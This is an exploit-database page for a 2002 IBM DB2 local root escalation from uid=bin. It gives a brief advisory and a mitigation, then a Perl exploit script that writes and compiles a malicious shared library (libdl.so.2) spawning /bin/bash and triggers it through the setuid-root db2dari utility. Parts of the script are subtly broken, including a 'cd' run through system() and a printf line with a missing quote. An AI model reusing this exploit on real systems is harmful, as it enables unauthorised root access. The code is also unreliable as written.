header-logo
Suggest Exploit
vendor:
DB2
by:
deadbeat
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: DB2
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

IBM DB2 local root from uid=bin

IBM DB2 ships with a number of shared libraries, stored in a directory owned by the user and group 'bin'. As setuid root utilities are linked to these libraries, their ownership by a user and group of a lower privilege level constitutes a vulnerability. If an attacker can obtain user or group bin privileges, the shared libraries can be overwritten with malicious replacements designed to obtain root privileges from the setuid root utilities that use them.

Mitigation:

Ensure that the shared libraries are owned by a user and group of a higher privilege level.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8346/info

IBM DB2 ships with a number of shared libraries, stored in a directory owned by the user and group 'bin'. As setuid root utilities are linked to these libraries, their ownership by a user and group of a lower privilege level constitutes a vulnerability. If an attacker can obtain user or group bin privileges, the shared libraries can be overwritten with malicious replacements designed to obtain root privileges from the setuid root utilities that use them.

#!/usr/bin/perl

#IBM DB2 local root from uid=bin 
#deadbeat,
#e:	daniels@legend.co.uk
#e:	deadbeat@sdf.lonestar.org

print "\nIBM db2 local bin escape to root sploit\n";
print "Preparing exploit...\n";

system("cd /usr/IBMdb2/V7.1/lib");
open FILEHANDLE, (">foo.c")or die "Cant open foo for writing..:(\n";
print FILEHANDLE "#include <stdio.h>\n";
print FILEHANDLE "#include <string.h>\n\n";
print FILEHANDLE "_init() {\n";
print FILEHANDLE "\tprintf(\"init..()\\n\");\n";
print FILEHANDLE "\tprintf(here we go: PID=\%i EUID=\%i\", getpid(), getuid());\n";
print FILEHANDLE "\tsystem(\"/bin/bash\");\n";
print FILEHANDLE "\tprintf(\"wicked done and dusted..\\n\")\n";
print FILEHANDLE "}";
close FILEHANDLE;
system("gcc -fpic -shared -o libdl.so.2 foo.c");
exec("db2dari")

Navigation

Suggest Exploit

Services By CQR